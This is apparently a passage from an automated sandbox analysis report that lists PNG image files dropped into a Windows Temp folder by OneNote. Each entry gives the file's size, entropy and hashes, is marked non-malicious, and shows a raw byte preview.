                                                                                                                                                                                                          SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                          MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                          SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                          SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                          SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{8EF835B8-E2F4-4898-BD35-11D9EB5F1C27}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):22634
                                                                                                                                                                                                          Entropy (8bit):7.974332204835705
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                          MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                          SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                          SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                          SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{93FCA214-C8C4-406C-B03E-0FE1586CCC7F}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13737
                                                                                                                                                                                                          Entropy (8bit):7.916899917415529
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                          MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                          SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                          SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                          SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{966E0018-6DB1-48F2-AC48-D14C4362FF7C}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7374
                                                                                                                                                                                                          Entropy (8bit):7.955141875077912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                          MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                          SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                          SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                          SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{98C1DFB0-9F53-4F98-966D-8EEB36DAE9ED}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4081
                                                                                                                                                                                                          Entropy (8bit):7.943373267196131
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                          MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                          SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                          SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                          SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{9FE1FDE1-05B5-415A-B08B-EE9920E631AC}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4190
                                                                                                                                                                                                          Entropy (8bit):7.94161730428269
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                          MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                          SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                          SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                          SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{A0BB90BE-B864-40F8-A219-093C297E8B56}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13084
                                                                                                                                                                                                          Entropy (8bit):7.940058639272698
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                          MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                          SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                          SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                          SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{A261A3BC-0CDE-43F8-817F-9FE54959105D}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2210
                                                                                                                                                                                                          Entropy (8bit):7.86853667196985
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                          MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                          SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                          SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                          SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{A2BA5479-19E1-452C-BA94-237AD86B05CC}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):22634
                                                                                                                                                                                                          Entropy (8bit):7.974332204835705
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                          MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                          SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                          SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                          SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{A4FDCE75-E6E8-4F58-AE0B-6F43AA521AC6}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1924
                                                                                                                                                                                                          Entropy (8bit):7.836744258175623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                          MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                          SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                          SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                          SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{A61FDD45-85F5-4561-A32A-4F27DFEABD5E}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1570
                                                                                                                                                                                                          Entropy (8bit):7.780157858994452
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                          MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                          SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                          SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                          SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{A690D71B-E7F8-4EF4-87F7-7AD36AA667FA}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4490
                                                                                                                                                                                                          Entropy (8bit):7.928016176674318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                          MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                          SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                          SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                          SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{A7D7A604-EAF9-440E-B1EC-C641F9FBB207}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7374
                                                                                                                                                                                                          Entropy (8bit):7.955141875077912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
